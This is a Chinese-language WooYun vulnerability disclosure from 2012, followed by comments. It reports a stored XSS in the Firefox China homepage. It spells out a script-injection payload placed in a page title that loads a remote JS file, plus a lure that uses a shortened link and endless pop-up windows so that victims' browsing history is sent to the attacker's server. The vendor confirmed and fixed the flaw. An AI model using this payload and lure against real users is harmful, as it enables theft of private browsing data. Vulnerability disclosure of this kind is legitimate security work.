利用火狐主页窃取用户浏览信息。

漏洞概要

缺陷编号:WooYun-2012-011398

漏洞标题:利用火狐主页窃取用户浏览信息。

相关厂商:火狐浏览器

漏洞作者:P1n9y_fly

提交时间:2012-08-27 15:39

公开时间:2012-10-11 15:40

漏洞类型:用户敏感数据泄漏

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

Tags标签:

漏洞详情

披露状态:

2012-08-27: 细节已通知厂商并且等待厂商处理中
2012-08-27: 厂商已经确认,细节仅向厂商公开
2012-08-30: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2012-10-21: 细节向核心白帽子及相关领域专家公开
2012-10-31: 细节向普通白帽子公开
2012-11-10: 细节向实习白帽子公开
2012-10-11: 细节向公众公开

简要描述:

利用火狐主页窃取用户浏览信息

详细说明:

火狐主页,就是我们一打开浏览器,默认跳转到的那个页面。遇见一件很奇怪的事情,虽然百度搜索那个地方木有XSS但是还是习惯性的去搜索这个关键字,看有没有别人在哪测试。

然后奇怪的事情就发生了:

我把浏览器关上,然后再打开结果就被弹了,百思不得其解,最后在这里发现了答案

原来是火狐主页会读取用户的历史记录并显示在网页上,但是恰好网页名字木有过滤。然后又在想,既然有XSS,又有历史记录,那我们不是可以通过这个获取用户的浏览历史记录么?将整个页面下载下来后,查看他的源代码。发现其调用的index.js里面有关于获取历史记录的代码

根据这一段代码我构造出一个相同功能的JS文件,并将历史记录ALERT出来:

弄好了之后我们试一下:在百度中搜索:"/><script/src=http://**.**.**.**/ff.js></script>关闭浏览器后重新打开

发现我的浏览记录果断的被弹出来了。然后我们就来研究进一步利用,我们构造了一个网页:w.html

然后构造一个JS文件获取用户浏览器历史记录:n.js

我们将网址:http://**.**.**.**/w.html弄成一个短地址:http://126.am/3wYfI3发给别人点开之后

网页无限被打开然后我们再加点,一看就知道是恶心广告的东西,一点开,什么都不想,直接关闭火狐。然后再重新打开的时候,因为我的网页名字被设置成了"/><script/src=http://**.**.**.**/n.js></script>由于火狐主页的那个XSS,就会被调用,然后执行其中的JS代码。用户的浏览信息就被传到我这里来了- -而因为网页打开次数很多,网页很有可能被加载到最常访问的页面,那一栏- -这就更悲剧了,每次开开心心的打开火狐浏览器- -亲爱的浏览记录就都跑到我这里来了 = =。如下图。

以上。

漏洞证明:

灰常谢谢goderci牛给的那个无限弹窗口导致人想关显示器的建议。。。

修复方案:

过来。。。。

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2012-08-27 21:39

厂商回复:

火狐主页已经修复了这个漏洞,并且上线了。非常感谢P1n9y_fly和乌云网对火狐浏览器的支持。xss漏洞真是防不胜防。希望今后能得到各位继续支持,共建美好而安全的互联网世界。

最新状态:

2012-08-27:这个漏洞是由于火狐主页显示用户浏览过的网页title时,如遇页面title内容含script标签,会导致远程脚本注入页面,有可能致使页面内其他内容(用户最常\最近访问网址)被第三方网站抓取。这个漏洞类型:xss类,触发方式:用户主动触发,涉及数据:历史纪录。所以我们评定危害等级中级。

评价

  1. 2010-01-01 00:00 xsser 白帽子 | Rank:152 漏洞数:17)

    非常赞!

  2. 2010-01-01 00:00 zidane 白帽子 | Rank:13 漏洞数:2)

    这下有意思了

  3. 2010-01-01 00:00 P1n9y_fly 白帽子 | Rank:97 漏洞数:11)

    @xsser 啊。。公开了T0T

  4. 2010-01-01 00:00 xsser 白帽子 | Rank:152 漏洞数:17)

    @P1n9y_fly 额 操作失误 等待认领吧

  5. 2010-01-01 00:00 zidane 白帽子 | Rank:13 漏洞数:2)

    我是乱入的。。。我什么也没看到

  6. 2010-01-01 00:00 P1n9y_fly 白帽子 | Rank:97 漏洞数:11)

    @xsser 话说,能联系到厂商么。。。T-T

  7. 2010-01-01 00:00 xsser 白帽子 | Rank:152 漏洞数:17)

    @P1n9y_fly 我看了 是不是中文版的额?

  8. 2010-01-01 00:00 P1n9y_fly 白帽子 | Rank:97 漏洞数:11)

    @xsser 嗯。。中文版的。。

  9. 2010-01-01 00:00 xsser 白帽子 | Rank:152 漏洞数:17)

    @P1n9y_fly OK,我去联系鸟

  10. 2010-01-01 00:00 P1n9y_fly 白帽子 | Rank:97 漏洞数:11)

    @xsser 嗯。。:]

  11. 2010-01-01 00:00 zeracker 白帽子 | Rank:1028 漏洞数:134)

    NB

  12. 2010-01-01 00:00 se55i0n 白帽子 | Rank:1483 漏洞数:156)

    膜拜~

  13. 2010-01-01 00:00 goderci 白帽子 | Rank:522 漏洞数:47)

    赞~

  14. 2010-01-01 00:00 zeracker 白帽子 | Rank:1028 漏洞数:134)

    剑心NB。一下子就联系上了

  15. 2010-01-01 00:00 P1n9y_fly 白帽子 | Rank:97 漏洞数:11)

    真心好快。。。

  16. 2010-01-01 00:00 瘦蛟舞 白帽子 | Rank:634 漏洞数:67)

    威武

  17. 2010-01-01 00:00 Anony 白帽子 | Rank:38 漏洞数:4)

    神马情况

  18. 2010-01-01 00:00 Defa 白帽子 | Rank:66 漏洞数:9)

    顶洞主

  19. 2010-01-01 00:00 P1n9y_fly 白帽子 | Rank:97 漏洞数:11)

    @火狐浏览器 你们好坦率。。。已经公布出来了。。。

  20. 2010-01-01 00:00 gainover 白帽子 | Rank:1331 漏洞数:97)

    火狐都来啦~~ 啥时候chrome也能来~~

  21. 2010-01-01 00:00 none 白帽子 | Rank:40 漏洞数:5)

    顶洞主

  22. 2010-01-01 00:00 xsser 白帽子 | Rank:152 漏洞数:17)

    @gainover 来个漏洞就可以了

  23. 2010-01-01 00:00 zidane 白帽子 | Rank:13 漏洞数:2)

    这个其实非常棒

  24. 2010-01-01 00:00 zzR 白帽子 | Rank:1179 漏洞数:101)

    @P1n9y_fly 我在 IOS CHROME上发现了类似的问题,也是自动执行历史记录,洞主你看能不能-0-

  25. 2010-01-01 00:00 蟋蟀哥哥 白帽子 | Rank:357 漏洞数:55)

    应该加精

  26. 2010-01-01 00:00 magerx 白帽子 | Rank:179 漏洞数:16)

    好流弊.